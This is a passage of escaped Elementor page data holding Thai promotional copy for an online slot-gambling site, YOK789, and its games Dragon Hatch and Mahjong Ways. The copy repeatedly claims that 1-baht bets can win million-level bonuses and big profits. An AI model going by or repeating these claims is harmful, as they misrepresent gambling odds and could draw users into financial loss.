\\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 YOK789 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e23\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 \\u0e46 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e15\\u0e39\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e15\\u0e48\\u0e28\\u0e31\\u0e01\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e01\\u0e25\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e40\\u0e19\\u0e49\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e01\\u0e47\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e44\\u0e25\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e16\\u0e39\\u0e01\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e23\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1f\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e41\\u0e15\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e01\\u0e32\\u0e23\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e39\\u0e48\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e25\\u0e47\\u0e01\\u0e41\\u0e15\\u0e48\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e43\\u0e19\\u0e42\\u0e25\\u0e01\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 YOK \\u0e22\\u0e01\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19 \\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 <\\/span><b>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17<\\/b> <span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e21\\u0e35\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e40\\u0e01\\u0e21\\u0e18\\u0e35\\u0e21\\u0e2a\\u0e21\\u0e1a\\u0e31\\u0e15\\u0e34\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e21\\u0e31\\u0e01\\u0e21\\u0e35\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e01\\u0e47\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e25\\u0e44\\u0e21\\u0e49\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e15\\u0e31\\u0e49\\u0e07\\u0e40\\u0e1a\\u0e17\\u0e15\\u0e48\\u0e33\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e08\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32 \\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e23\\u0e07\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e15\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e47\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1a\\u0e17\\u0e40\\u0e1a\\u0e32\\u0e41\\u0e15\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Mahjong Ways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Mahjong Ways \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e44\\u0e1e\\u0e48\\u0e19\\u0e01\\u0e01\\u0e23\\u0e30\\u0e08\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e15\\u0e01\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e2b\\u0e25\\u0e22\\u0e32\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e2d\\u0e21\\u0e42\\u0e1a 